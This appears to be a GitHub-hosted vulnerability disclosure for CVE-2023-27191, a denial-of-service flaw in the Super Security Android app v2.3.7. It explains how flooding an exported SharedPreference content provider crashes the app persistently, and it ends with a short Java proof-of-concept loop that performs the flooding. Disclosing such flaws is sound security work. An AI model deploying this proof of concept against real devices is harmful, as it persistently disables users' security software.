Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Denial of Service exists in Super Secuirty(CVE-2023-27191)

Vendor:DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product:Super Security (com.ludashi.security)

Version:2.3.7

Download link:https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security

Description of the vulnerability for use in the CVE:An issue found in DUALSPACE Super Secuirty v.2.3.7 allows an attacker to cause a denial of service via the SharedPreference files.

Additional information:The Super Security app is a security application that offers several security-related functions. Upon opening the app, it loads the SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Super Security app will load excessive data into memory, which can trigger an OOM error and cause the app to crash. Even worse, simply restarting the app will not fix the security issue, as the injected data is persistent in the SharedPreference files. In practice, this means that the Super Security app becomes unable to launch successfully.

poc:

public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
  	While(true){
        contentValues.put("file_name","__default__");
    	  contentValues.put("type",4);
    	  contentValues.put("key",RandomString);
    	  contentValues.put("value",RandomString);
    	  contentResolver.insert(uri, contentValues); 
    }
}